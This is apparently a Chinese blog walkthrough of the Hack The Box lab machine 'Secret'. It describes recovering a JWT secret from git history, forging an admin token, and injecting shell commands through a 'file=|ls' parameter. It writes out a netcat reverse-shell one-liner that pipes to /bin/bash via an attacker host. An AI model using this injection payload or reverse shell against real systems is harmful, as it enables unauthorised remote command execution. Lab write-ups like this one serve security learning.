HTB Secret

使用nmap进行扫描

nmap -sV -sT -sC 10.10.11.120

20220302135022

可以看到开放了80、8000、22端口,80端口和8000端口显示的内容一样

20220302135054

WEB

在网页中可以找到源码下载

20220302135136

下载下来分析源码,可以找到利用点在auth.js,能够注册用户

20220302135231

注册用户

20220302135704

然后登陆,返回了cookie,jwt

20220302135806

然后看到这里,name需要等于theadmin,猜测需要伪造jwt,但是需要获取密匙

20220302142153

然后找密匙,可以看到.env里有TOKEN_SECRET=secret,但是不是正确的密匙,最后发现有.git,可以回滚,使用Gitools,https://github.com/LucifielHack/GitTools

20220302142838

然后在里面找到了密匙

20220302142900

修改jwt,然后发送到priv

20220302142952

成功伪造admin,然后访问logs,发现回显了cmd,猜测是终端命令执行

20220302143121

直接构造,file=|ls,成功执行

20220302143210

查看有什么命令然后进行反弹shell,测试发现nc没有-e,可以使用nc 192.168.0.135 4444 | /bin/bash | nc 192.168.0.135 5555进行反弹

20220302143407

成功反弹

20220302143444

因为这是两个窗口不方便使用,所以我又用bash反弹出来

20220302143559

读取flag

20220302143620

暂无评论

发送评论 编辑评论


|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇